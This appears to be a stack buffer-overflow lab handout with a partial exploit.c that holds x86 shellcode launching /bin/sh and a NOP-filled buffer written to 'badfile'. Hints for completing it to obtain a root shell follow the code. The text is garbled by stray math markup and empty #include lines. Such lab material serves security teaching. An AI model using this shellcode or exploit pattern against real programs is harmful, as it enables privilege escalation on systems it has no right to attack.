We provide you with a partially completed exploit code called $$exploit$.$c$.$ The goal of this code is to construct contents for $$badfile$.$ In this code, the shellcode is given to you. You need to develop the rest. $/*$ exploit.c $*//*$ A program that creates a file containing code for launching shell$*/$ #include #include #include char shellcode$[]="\backslash$x$31\backslash$xc$0""\backslash$x$50""\backslash$x$68""//$sh$""\backslash$x$68""/$bin$""\backslash$x$89\backslash$xe$3""\backslash$x$50""\backslash$x$53""\backslash$x$89\backslash$xe$1""\backslash$x$99""\backslash$xb$0\backslash$x$0$b$""\backslash$xcd$\backslash$x$80"$ ; $/*$ xorl $\%$eax,$\%$eax $/*$ pushl $\%$eax $/*$ pushl $$0$x$68732$f$2$f $/*$ pushl $$0$x$6$e$69622$f $/*$ movl $\%$esp,$\%$ebx $/*$ pushl $\%$eax $/*$ pushl $\%$ebx $/*$ movl $/*$ cdq $/*$ movb $/*$ int void main$($int argc, char $**$argv$)\{$ char buffer$[517]$; FILE $*$badfile; $\%$esp,$\%$ecx $$0$x$0$b$,\%$al $$0$x$80/*$ Initialize buffer with $0$x$90($NOP instruction$)*/$ memset$($&buffer, $0$x$90,517)$; $*/*/*/*/*/*/*/*/*/*/*//*$ You need to fill the buffer with appropriate contents here $*//*$ Save the contents to the file "badfile" $*/$ badfile $=$ fopen$("./$badfile$","$w$")$; fwrite$($buffer$,517,1,$ badfile$)$; fclose$($badfile$)$; $\}$ After you finish the above program, compile and run it$.$ This will generate the contents for $$badfile$.$ Then run the vulnerable program stack. If your exploit is implemented correctly, you should be able to get a root shell in the given exploit.c the buffer size is given as $1000$ in the main function, you can change it to $517$ and follow the exploit scenario given in the above AlephOne's stack smashing link. For example, you can set offset$=200$ and bsize$=517.$ When insertion in the buffer is complete you may put a NULL code$/$character in the buffer:

buffer$[$bsize $-1]=\text{'}\backslash 0\text{'}$;

Finally, save the buffer and write it into the bad file by:

badfile $=$ fopen$("./$badfile$","$w$")$;

fwrite$($buffer$,517,1,$ badfile$)$;

fclose$($badfile$)$;